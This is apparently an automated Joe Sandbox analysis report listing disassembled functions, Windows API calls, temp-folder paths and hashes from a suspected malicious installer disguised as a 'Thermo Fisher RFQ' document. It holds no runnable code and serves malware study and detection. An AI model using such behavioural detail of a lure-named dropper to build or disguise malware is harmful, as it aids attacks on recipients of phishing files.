Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EF9

GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 0040163F

Part of subcall function 00405AA8: CreateDirectoryW.KERNELBASE(?,?), ref: 00405AEA

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards,?,00000000,?), ref: 00401672

Strings

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards, xrefs: 00401665

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards
API String ID: 1892508949-1958581672
Opcode ID: 60c2c0ddde8b7e5a5259822198f5dfbdca4b1fe95804475fb22a6f2f1a41da81
Instruction ID: 2b03c7a92312b5a1b0d009ad41e3f6a941738229f321331d68055a18e38198b9
Opcode Fuzzy Hash: 60c2c0ddde8b7e5a5259822198f5dfbdca4b1fe95804475fb22a6f2f1a41da81
Instruction Fuzzy Hash: 4511D031504514EBCF207FA5CD056AF36A0EF04368B25493FE941B22F1D63D4A81DA5E

Function 00406422 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Call,?,00000000,00406693,80000002), ref: 00406468
RegCloseKey.KERNELBASE(?), ref: 00406473

Strings

Call, xrefs: 00406429

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: 8bbbfa9f798598a3d1dedb2a9c281e33174829b5b93865dedadbfc74a219c892
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: 9F01B132110209BADF21CF51CD05EDB3BA8EB44360F018039FD1692150D738DA64DBA4

Function 004020FD Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 00402128

Part of subcall function 004055D9: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
Part of subcall function 004055D9: lstrlenW.KERNEL32(0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
Part of subcall function 004055D9: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,0040341A,0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0), ref: 00405634
Part of subcall function 004055D9: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll), ref: 00405646
Part of subcall function 004055D9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
Part of subcall function 004055D9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
Part of subcall function 004055D9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694

LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 00402139
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,?,?,00000001,?), ref: 004021B6

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 297150e83417b5866f3c74e4a486ab5a4ba485464345ec717dcdc95307e67a96
Instruction ID: 73d72cb5994b484f29e4ff80cb350354ef05bb92eb19bb99874f54bc55697afd
Opcode Fuzzy Hash: 297150e83417b5866f3c74e4a486ab5a4ba485464345ec717dcdc95307e67a96
Instruction Fuzzy Hash: EF21A131904104EACF10AFA5CF89A9E7A71BF54359F30413FF105B91E5DBBD89829A2E

Function 00401BC0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00AA87D0), ref: 00401C30
GlobalAlloc.KERNELBASE(?,00000804), ref: 00401C42

Strings

Call, xrefs: 00401BE7, 00401BED, 00401C07

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: a35846d0fa1f5f62d1cc44f85dbd038e6f418717e16ba0fa97b0d6e40a5ea598
Instruction ID: 6559a21230efabb52023b21709d08c05de394b4458a3aca8e6f4fe2726326e98
Opcode Fuzzy Hash: a35846d0fa1f5f62d1cc44f85dbd038e6f418717e16ba0fa97b0d6e40a5ea598
Instruction Fuzzy Hash: 6A216F73904110ABDB20FBA8DEC5A5E72E4AB08324715053BE552B72D5C6BCA8819B9D

Function 6FE71058 Relevance: 4.6, APIs: 3, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GlobalSize.KERNEL32(00000000), ref: 6FE710AA
GlobalAlloc.KERNEL32(?,00000000), ref: 6FE710B9
GlobalFree.KERNEL32(00000000), ref: 6FE710D6

Memory Dump Source

Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true

Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Global$AllocFreeSize
String ID:
API String ID: 465308736-0
Opcode ID: 0cf20f63f181bb38543e18fcdbfd2a285371116622d733096267f9454ad545f8
Instruction ID: 3a33a5bce8b999a35343d57d05c8b5c51b7fecbe9ef4a2e5ef112f5f7404c28d
Opcode Fuzzy Hash: 0cf20f63f181bb38543e18fcdbfd2a285371116622d733096267f9454ad545f8
Instruction Fuzzy Hash: 3701B572504710A7CB31ABF9686484B3FEEAF4A224721412AFA04C7280EF78E401CB51

Function 004025C3 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025F6
RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 00402609
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402622

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 6b26a19a6a49c8cdb85b468f9485b09a4b214ce950142c5c676665e06fea9f6e
Instruction ID: e355f0d3af3fae611af142f11dea5172e840e8f974d60c5f977c655607c85d86
Opcode Fuzzy Hash: 6b26a19a6a49c8cdb85b468f9485b09a4b214ce950142c5c676665e06fea9f6e
Instruction Fuzzy Hash: 5801DF71A04605BBEB149F94DE48BAFB668FF80308F10443EF001B21D0D7B84E41976D

Function 6FE71774 Relevance: 3.8, APIs: 3, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 6FE71BFF: GlobalFree.KERNEL32(?), ref: 6FE71E74
Part of subcall function 6FE71BFF: GlobalFree.KERNEL32(?), ref: 6FE71E79
Part of subcall function 6FE71BFF: GlobalFree.KERNEL32(?), ref: 6FE71E7E

CloseHandle.KERNELBASE(00000000), ref: 6FE717DC

Part of subcall function 6FE71312: GlobalAlloc.KERNEL32(?,?,?,6FE715FE,?), ref: 6FE71328
Part of subcall function 6FE71312: lstrcpynW.KERNEL32(00000004,?,?,6FE715FE,?), ref: 6FE7133E

Memory Dump Source

Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true

Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Global$Free$AllocCloseHandlelstrcpyn
String ID:
API String ID: 363591596-0
Opcode ID: baffb7b74141f9b60dab47e07990219c11e4232d51df16f95f9c699411d8802f
Instruction ID: a201628c96e2ad559d9f765c27b649555b9b9e90a914b44ee561ec1b505f4cb0
Opcode Fuzzy Hash: baffb7b74141f9b60dab47e07990219c11e4232d51df16f95f9c699411d8802f
Instruction Fuzzy Hash: 3901A572408B50EADA31DBF8D424F8A7FD5AF43328F34091EE54492180DF2CA441D7A2

Function 0040254F Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000033,00020019), ref: 00402580
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402622

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 3b7a533e92f914db3672ef71fd19957ac7f0611522e7cd12c869ba850adf7419
Instruction ID: 6577050f37a29122a5cb82ae63a7e3627040baffe8f236fb698a7bc144352859
Opcode Fuzzy Hash: 3b7a533e92f914db3672ef71fd19957ac7f0611522e7cd12c869ba850adf7419
Instruction Fuzzy Hash: 51119E71904216EADF15DFA0DA589AEB7B4FF04348F20443FE802B62D0D7B84A45DB5E

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
Instruction ID: cd791cecd07b1aef7d4b508d0a52a2ac0ec5e235a68ccce80931b69816989e44
Opcode Fuzzy Hash: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
Instruction Fuzzy Hash: 6301F4326242109BE7195B389D05B6B36A8F791314F10863FF955F62F1DA78CC42DB4D

Function 00405AA8 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 00405AEA
GetLastError.KERNEL32 ref: 00405AF8

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction ID: 13352011552d0ddc4b0c1568d720dcd5f2ba617a9a750a7f60e40e4c0ab4bb23
Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction Fuzzy Hash: 52F0F4B0D0060EDADB00CFA4C6487EFBBB4AB04309F10812AD941B6281D7B882488FA9

Function 00401F03 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401F21
EnableWindow.USER32(00000000,00000000), ref: 00401F2C

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 43dff4b1693335f93dfca754fceec6b37362f049de9d354dc4597a38bacc65dc
Instruction ID: 98303f18ab294370b9404d3d0833ea925ed9fe29ea468c813ed2a63de2513d45
Opcode Fuzzy Hash: 43dff4b1693335f93dfca754fceec6b37362f049de9d354dc4597a38bacc65dc
Instruction Fuzzy Hash: 28E04F76908610DFE748EBA4AE499AEB7B4FF80365B20497FE001F11E1DBB94D00966D

Function 00405B37 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?,?,?,1012,?), ref: 00405B60
CloseHandle.KERNEL32(?,?,?,1012,?), ref: 00405B6D

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
Instruction ID: e42c3092a0fd4a031c4fd4b3b8927d6f3122727aa63034fdce6a98e2e8d9435a
Opcode Fuzzy Hash: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
Instruction Fuzzy Hash: ECE09AB4900249BFEB109F64AD05E7B776CE745644F008525BD10F6151D775A8148A79

Function 00401598 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 004015AC
ShowWindow.USER32(?), ref: 004015C1

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 161f1189b96c1e050d17504ce5c39e59e81e919b68ff6b2bf5ceaddda9e07bf6
Instruction ID: d7c79e80ad2a22e998040c9ddd7ac57f7a29ae31a8ed4af3f77ef46bec42490e
Opcode Fuzzy Hash: 161f1189b96c1e050d17504ce5c39e59e81e919b68ff6b2bf5ceaddda9e07bf6
